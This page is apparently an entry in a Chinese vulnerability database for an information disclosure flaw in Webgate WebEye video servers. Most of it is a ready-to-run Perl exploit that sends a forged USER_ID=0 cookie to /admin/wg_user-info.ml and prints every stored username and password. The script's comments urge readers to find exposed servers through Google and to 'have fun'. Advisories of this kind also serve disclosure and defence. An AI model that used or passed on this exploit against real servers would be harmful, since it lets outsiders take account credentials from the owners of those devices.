Webgate WebEye – Information Disclosure
| 漏洞ID | 1054284 | 漏洞类型 | |
| 发布时间 | 2003-12-08 | 更新时间 | 2003-12-08 |
CVE编号
|
N/A |
CNNVD-ID
|
N/A |
| 漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9169/info
It has been reported that WebEye is prone to an information disclosure vulnerability that may allow an attacker to harvest sensitive information from the server such as usernames and passwords. The problem exists in the '/admin/wg_user-info.ml' script that fails to verify user credentials before returning sensitive information.
#!/usr/bin/perl
########################################################################
# Author: datapath
# E-mail: [email protected]
# Date: Dec 2003
# 44c545672ac14e9e0f968b3affcd0740
# WHAT IS THIS?
# This is an exploit to retrieve all username and passwords from a
# webeye video server.
# REQUIREMENTS
# It requires some perl libraries. If you dont have them already
# installed, search cpan.org.
# HOW DOES IT WORKS?
# Well, its very simple, because the server provides a mechanism (not
# documented) to retrieve all passwords! You can read the code below,
# its short and simple.
# If you think its fun, but dont know any webeye video server, just make
a
# search in Google. You will find a lot of them! Have fun!
###########################################################################
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name>n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp =
$browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0;
path=/;");
$t = $resp->content;
#print $t;
$i = index($t,"<tr");
substr($t,0,$i+1,"");
while ($i!=-1) {
$i = index($t,"<tr");
substr($t,0,$i+1,"");
$i = index($t,"value=");
substr($t,0,$i+7,"");
$j = index($t,""");
$user = substr($t,0,$j);
if ($user =~ /Apply/) { print "nHave fun!n"; exit; }
print "user: ".$user;
$i = index($t,"value=");
substr($t,0,$i+7,"");
$j = index($t,""");
print "tpass: ".substr($t,0,$j)."n";
}
WircSrv IRC服务器读取任意文件漏洞 漏洞ID 1206309 漏洞类型 未知 发布时间 2000-10-20 更新时间 2000-10-20 CVE编号 CVE-2000-0785 CNNVD-ID CNNVD-200010-081 漏洞平台 N/A…
正文完
发表至: 网络安全漏洞
2021年4月9日
CVE编号
CNNVD-ID